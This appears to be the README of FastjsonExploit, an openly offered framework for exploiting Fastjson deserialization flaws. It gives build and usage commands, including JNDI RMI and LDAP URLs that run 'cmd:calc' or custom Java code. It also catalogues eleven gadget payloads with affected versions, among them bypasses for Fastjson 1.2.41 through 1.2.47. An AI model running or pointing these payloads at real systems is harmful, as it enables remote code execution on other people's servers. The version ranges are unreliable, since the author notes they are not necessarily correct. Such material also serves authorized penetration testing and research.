FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:
- 一键生成利用payload,并启动所有利用环境。
- 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
.---- -. -. . . . ( .',----- - - ' ' \_/ ;--:-\ __--------------------__ __U__n_^_''__[. |ooo___ | |_!_||_!_||_!_||_!_| | c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| | ,_\___________'_|,L______],|______________________| /;_(@)(@)==(@)(@) (o)(o) (o)^(o)--(o)^(o) FastjsonExploit is a Fastjson library vulnerability exploit framework Author:c0ny1<root@gv7.me> Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command] Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc" Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java" Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc" Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java" Available payload types: Payload PayloadType VulVersion Dependencies ------- ----------- ---------- ------------ BasicDataSource1 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4 BasicDataSource2 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4 JdbcRowSetImpl1 jndi 1.2.2.1-1.2.2.4 JdbcRowSetImpl2 jndi 1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass JdbcRowSetImpl3 jndi 1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass JdbcRowSetImpl4 jndi 1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass JdbcRowSetImpl5 jndi 1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass JndiDataSourceFactory1 jndi 1.2.2.1-1.2.2.4 ibatis-core:3.0 SimpleJndiBeanFactory1 jndi 1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE TemplatesImpl1 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField) TemplatesImpl2 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField) - 帮助信息所说明的payload可利用的Fastjson版本,不一定正确。后续测试更正!